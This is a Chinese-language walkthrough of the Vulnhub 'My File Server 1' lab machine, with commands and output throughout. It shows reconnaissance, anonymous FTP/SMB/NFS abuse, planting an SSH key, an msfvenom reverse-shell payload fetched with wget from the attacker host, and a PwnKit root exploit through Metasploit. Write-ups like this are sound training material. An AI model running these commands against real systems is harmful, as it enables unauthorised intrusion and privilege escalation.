My File Server 1
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:15:69:14 1 60 PCS Systemtechnik GmbH
192.168.56.241 08:00:27:18:01:4f 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.241
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.241 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-02 23:03 EDT
Nmap scan report for bogon (192.168.56.241)
Host is up (0.00038s latency).
Not shown: 64445 filtered tcp ports (no-response), 78 filtered tcp ports (host-prohibited), 1004 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.230
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 3 0 0 16 Feb 19 2020 pub [NSE: writeable]
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
| 256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_ 256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS))
|_http-title: My File Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100003 3,4 2049/udp nfs
| 100003 3,4 2049/udp6 nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/tcp6 mountd
| 100005 1,2,3 20048/udp mountd
| 100005 1,2,3 20048/udp6 mountd
| 100021 1,3,4 40616/tcp nlockmgr
| 100021 1,3,4 40682/udp6 nlockmgr
| 100021 1,3,4 55421/udp nlockmgr
| 100021 1,3,4 55961/tcp6 nlockmgr
| 100024 1 36550/tcp status
| 100024 1 43557/tcp6 status
| 100024 1 54267/udp6 status
| 100024 1 54358/udp status
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:18:01:4F (Oracle VirtualBox virtual NIC)
Service Info: Host: FILESERVER; OS: Unix
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-03T03:05:13
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2023-04-03T08:35:11+05:30
|_clock-skew: mean: -1h50m01s, deviation: 3h10m31s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.16 seconds
获得Shell
端口21
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ftp 192.168.56.241
Connected to 192.168.56.241.
220 (vsFTPd 3.0.2)
Name (192.168.56.241:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5022|).
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 16 Feb 18 2020 .
drwxr-xr-x 3 0 0 16 Feb 18 2020 ..
drwxrwxrwx 3 0 0 16 Feb 19 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5027|).
150 Here comes the directory listing.
drwxrwxrwx 3 0 0 16 Feb 19 2020 .
drwxr-xr-x 3 0 0 16 Feb 18 2020 ..
drwxr-xr-x 9 0 0 4096 Feb 19 2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5396|).
150 Here comes the directory listing.
drwxr-xr-x 9 0 0 4096 Feb 19 2020 .
drwxrwxrwx 3 0 0 16 Feb 19 2020 ..
drwxr-xr-x 2 0 0 4096 Feb 19 2020 anaconda
drwxr-x--- 2 0 0 22 Feb 19 2020 audit
-rw-r--r-- 1 0 0 7033 Feb 19 2020 boot.log
-rw------- 1 0 0 10752 Feb 19 2020 btmp
-rw-r--r-- 1 0 0 9161 Feb 19 2020 cron
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg
-rw-r--r-- 1 0 0 31971 Feb 19 2020 dmesg.old
drwxr-xr-x 2 0 0 6 Feb 19 2020 glusterfs
drwx------ 2 0 0 39 Feb 19 2020 httpd
-rw-r--r-- 1 0 0 292584 Feb 19 2020 lastlog
-rw------- 1 0 0 3764 Feb 19 2020 maillog
-rw------- 1 0 0 1423423 Feb 19 2020 messages
drwx------ 2 0 0 6 Feb 19 2020 ppp
drwx------ 4 0 0 43 Feb 19 2020 samba
-rw------- 1 0 0 63142 Feb 19 2020 secure
-rw------- 1 0 0 0 Feb 19 2020 spooler
-rw------- 1 0 0 0 Feb 19 2020 tallylog
drwxr-xr-x 2 0 0 22 Feb 19 2020 tuned
-rw-r--r-- 1 0 0 58752 Feb 19 2020 wtmp
-rw------- 1 0 0 100 Feb 19 2020 xferlog
-rw------- 1 0 0 18076 Feb 19 2020 yum.log
226 Directory send OK.
端口2121
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ftp 192.168.56.241 -P 2121
Connected to 192.168.56.241.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.241]
Name (192.168.56.241:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||18594|)
ftp: Can't connect to `192.168.56.241:18594': No route to host
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 3 root root 16 Feb 18 2020 .
drwxr-xr-x 3 root root 16 Feb 18 2020 ..
drwxrwxrwx 3 root root 16 Feb 19 2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls -alh
200 EPRT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 3 root root 16 Feb 19 2020 .
drwxr-xr-x 3 root root 16 Feb 18 2020 ..
drwxr-xr-x 9 root root 4.0k Feb 19 2020 log
226 Transfer complete
端口2121所在的目录与端口21一致。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ searchsploit proFTPD 1.3.5
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
-------------------------------------------------------------------------------------------------
ProFTPd存在mod_copy漏洞。
端口445
──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ smbclient //192.168.56.241/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Feb 20 06:07:55 2020
.. D 0 Tue Feb 18 06:47:54 2020
anaconda D 0 Tue Feb 18 06:48:15 2020
audit D 0 Tue Feb 18 06:48:15 2020
boot.log N 6120 Tue Feb 18 06:48:16 2020
btmp N 384 Tue Feb 18 06:48:16 2020
cron N 4813 Tue Feb 18 06:48:16 2020
dmesg N 31389 Tue Feb 18 06:48:16 2020
dmesg.old N 31389 Tue Feb 18 06:48:16 2020
glusterfs D 0 Tue Feb 18 06:48:16 2020
lastlog N 292292 Tue Feb 18 06:48:16 2020
maillog N 1982 Tue Feb 18 06:48:16 2020
messages N 684379 Tue Feb 18 06:48:17 2020
ppp D 0 Tue Feb 18 06:48:17 2020
samba D 0 Tue Feb 18 06:48:17 2020
secure N 11937 Tue Feb 18 06:48:17 2020
spooler N 0 Tue Feb 18 06:48:17 2020
tallylog N 0 Tue Feb 18 06:48:17 2020
tuned D 0 Tue Feb 18 06:48:17 2020
wtmp N 25728 Tue Feb 18 06:48:17 2020
xferlog N 100 Tue Feb 18 06:48:17 2020
yum.log N 10915 Tue Feb 18 06:48:17 2020
sshd_config N 3906 Wed Feb 19 02:46:38 2020
19976192 blocks of size 1024. 18285512 blocks available
smb: \> put test.txt
putting file test.txt as \test.txt (5.9 kb/s) (average 5.9 kb/s)
smb: \> pwd
Current directory is \\192.168.56.241\smbdata\
可以通过smb上传文件。
─(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ enum4linux 192.168.56.241
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\smbuser (Local User)
通过enum4linux工具可以识别出用户名smbuser
端口2049
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ showmount -e 192.168.56.241
Export list for 192.168.56.241:
/smbdata 192.168.56.0/24
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ mkdir sharedata
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ sudo mount -t nfs 192.168.56.241:/smbdata sharedata
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ cd sharedata
可以通过NFS协议上传文件到目标主机。
端口80
└─$ gobuster dir -u http://192.168.56.241 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.241
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/04/02 23:36:54 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 207]
/index.html (Status: 200) [Size: 174]
/readme.txt (Status: 200) [Size: 25]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ curl http://192.168.56.241/readme.txt
My Password is
rootroot1
接下来可以生成我们自己的ssh公钥,然后通过smb协议上传至smbdata目录,利用proFTPD的mod_copy漏洞移动至/home/smbuser/.ssh/authorized_keys(重命名)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:omJWVH15Va1fXgFh8RuzDRXjgsYfv+nmDJNXu7rvoZY kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| .. . *=+=|
| . . + + ooo|
| . . = o.*.|
| . . . =.O|
| . . S . *=|
| . . . . B|
| + . +.* |
| o . EB.o|
| .+BB |
+----[SHA256]-----+
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ls -alh
total 28K
drwxr-xr-x 3 kali kali 4.0K Apr 2 23:14 .
drwxr-xr-x 15 kali kali 4.0K Apr 2 22:59 ..
-rw------- 1 kali kali 2.6K Apr 2 23:14 id_rsa
-rw-r--r-- 1 kali kali 563 Apr 2 23:14 id_rsa.pub
-rw-r--r-- 1 root root 3.6K Apr 2 23:05 nmap_full_scan
drwxrwxrwx 8 root root 4.0K Apr 2 23:09 sharedata
-rw-r--r-- 1 kali kali 12 Apr 2 23:08 test.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ smbclient //192.168.56.241/smbdata
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> put id_rsa.pub
putting file id_rsa.pub as \id_rsa.pub (137.4 kb/s) (average 137.5 kb/s)
smb: \> quit
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ telnet 192.168.56.241 2121
Trying 192.168.56.241...
Connected to 192.168.56.241.
Escape character is '^]'.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.241]
SITE CPFR /smbdata/id_rsa.pub
350 File or directory exists, ready for destination name
SITE CPTO /home/smbuser/.ssh/authorized_keys
550 CPTO: Permission denied
报错,没有权限拷贝到/home/smbuser/.ssh/authorized_keys
但是前面已经得到一个密码,会不会是ftp的密码
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ftp 192.168.56.241
Connected to 192.168.56.241.
220 (vsFTPd 3.0.2)
Name (192.168.56.241:kali): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5356|).
150 Here comes the directory listing.
drwx------ 2 1000 1000 79 Feb 18 2020 .
drwxr-xr-x 3 0 0 20 Feb 19 2020 ..
-rw------- 1 1000 1000 27 Feb 20 2020 .bash_history
-rw-r--r-- 1 1000 1000 18 Mar 05 2015 .bash_logout
-rw-r--r-- 1 1000 1000 193 Mar 05 2015 .bash_profile
-rw-r--r-- 1 1000 1000 231 Mar 05 2015 .bashrc
似乎是smbuser的家目录
──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ mv id_rsa.pub authorized_keys
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ftp 192.168.56.241
Connected to 192.168.56.241.
220 (vsFTPd 3.0.2)
Name (192.168.56.241:kali): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||5356|).
150 Here comes the directory listing.
drwx------ 2 1000 1000 79 Feb 18 2020 .
drwxr-xr-x 3 0 0 20 Feb 19 2020 ..
-rw------- 1 1000 1000 27 Feb 20 2020 .bash_history
-rw-r--r-- 1 1000 1000 18 Mar 05 2015 .bash_logout
-rw-r--r-- 1 1000 1000 193 Mar 05 2015 .bash_profile
-rw-r--r-- 1 1000 1000 231 Mar 05 2015 .bashrc
226 Directory send OK.
ftp> cat .bash_history
?Invalid command.
ftp> mkdir .ssh
257 "/home/smbuser/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||5958|).
150 Ok to send data.
100% |****************************************************************************************************************| 563 14.51 MiB/s 00:00 ETA
226 Transfer complete.
563 bytes sent in 00:00 (17.92 KiB/s)
成功将公钥(改名为authorized_keys)上传至目标主机smbuser家目录
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MyFileServer1]
└─$ ssh -i id_rsa smbuser@192.168.56.241
The authenticity of host '192.168.56.241 (192.168.56.241)' can't be established.
ED25519 key fingerprint is SHA256:ccn0TgE4/OXtSpg3oMO2gVNYXrps4Zi+XcBgaDZnW78.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:7: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.241' (ED25519) to the list of known hosts.
##############################################################################################
# Armour Infosec #
# --------- www.armourinfosec.com ------------ #
# My File Server - 1 #
# Designed By :- Akanksha Sachin Verma #
# Twitter :- @akankshavermasv #
##############################################################################################
Last login: Thu Feb 20 16:42:21 2020
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$
至此得到了smbuser的shell
提权
接下来用metasploit进行本地提权。
-
利用msfvenom创建载荷
─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=5555 -f elf -o escalate.elf
-
将上述载荷上传到目标主机的/tmp目录,并赋予可执行权限
[smbuser@fileserver tmp]$ wget http://192.168.56.230:8000/escalate.elf --2023-04-03 09:14:58-- http://192.168.56.230:8000/escalate.elf Connecting to 192.168.56.230:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 207 [application/octet-stream] Saving to: ‘escalate.elf’ 100%[===================================================================================================================>] 207 --.-K/s in 0s 2023-04-03 09:14:58 (47.7 MB/s) - ‘escalate.elf’ saved [207/207] [smbuser@fileserver tmp]$ chmod +x escalate.elf
-
在Kali上启动msfconsole,选择multi/handler模块,启动侦听(需要选择与msfvenom相同的载荷)
/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) > set LHOST 192.168.56.230 LHOST => 192.168.56.230 msf6 exploit(multi/handler) > set LPORT 5555 LPORT => 5555 msf6 exploit(multi/handler) > run
-
在目标主机执行./escalate.elf,Kali linux上得到了meterpreter session
msf6 exploit(multi/handler) > search suggester Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf6 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf6 post(multi/recon/local_exploit_suggester) > run [*] 192.168.56.241 - Collecting local exploits for x86/linux... [*] 192.168.56.241 - 167 exploit checks are being tried... [+] 192.168.56.241 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable. [+] 192.168.56.241 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable. [+] 192.168.56.241 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated. [+] 192.168.56.241 - exploit/linux/local/pkexec: The service is running, but could not be validated. [+] 192.168.56.241 - exploit/linux/local/ptrace_sudo_token_priv_esc: The service is running, but could not be validated. [+] 192.168.56.241 - exploit/linux/local/su_login: The target appears to be vulnerable. [*] Running check method for exploit 48 / 48 [*] 192.168.56.241 - Valid modules for session 1: ============================ # Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable. 2 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable. 3 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated. 4 exploit/linux/local/pkexec Yes The service is running, but could not be validated. 5 exploit/linux/local/ptrace_sudo_token_priv_esc Yes The service is running, but could not be validated. 6 exploit/linux/local/su_login Yes The target appears to be vulnerable.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 6666
LPORT => 6666
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.56.230:6666
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.aznhokm
[+] The target is vulnerable.
[*] Writing '/tmp/.echgnco/vfwgxvdzhmrm/vfwgxvdzhmrm.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.echgnco
[*] Sending stage (3020772 bytes) to 192.168.56.241
[+] Deleted /tmp/.echgnco/vfwgxvdzhmrm/vfwgxvdzhmrm.so
[+] Deleted /tmp/.echgnco/.hvcnamcdo
[+] Deleted /tmp/.echgnco
[*] Meterpreter session 2 opened (192.168.56.230:6666 -> 192.168.56.241:47181) at 2023-04-02 23:53:34 -0400
meterpreter > shell
Process 15533 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),1000(smbuser)
cd /root
ls -alh
total 44K
drwxr--r--. 4 root root 4.0K Feb 20 2020 .
dr-xr-xr-x. 18 root root 4.0K Feb 18 2020 ..
-rwxr--r--. 1 root root 84 Feb 20 2020 .bash_history
-rwxr--r--. 1 root root 18 Dec 29 2013 .bash_logout
-rwxr--r--. 1 root root 176 Dec 29 2013 .bash_profile
-rwxr--r--. 1 root root 176 Dec 29 2013 .bashrc
-rwxr--r--. 1 root root 100 Dec 29 2013 .cshrc
drwxr--r--. 3 root root 18 Feb 18 2020 .pki
drwxr--r-- 2 root root 6 Feb 19 2020 .ssh
-rwxr--r--. 1 root root 129 Dec 29 2013 .tcshrc
-rwxr--r-- 1 root root 6.0K Feb 20 2020 .viminfo
-rwxr--r-- 1 nobody nobody 48 Feb 20 2020 proof.txt
cat proof.txt
Best of Luck
af52e0163b03cbf7c6dd146351594a43
至此得到root shell和root flag
经验教训
-
本靶机用通常的方法,即通过smb协议将公钥上传至目标主机smbdata目录下,然后利用proFTPd的mod_copy漏洞拷贝至用户smbuser的家目录,并不奏效,没有权限。
-
不能忽略每种协议的信息收集,比如本靶机中的80端口竟然有密码文本文件s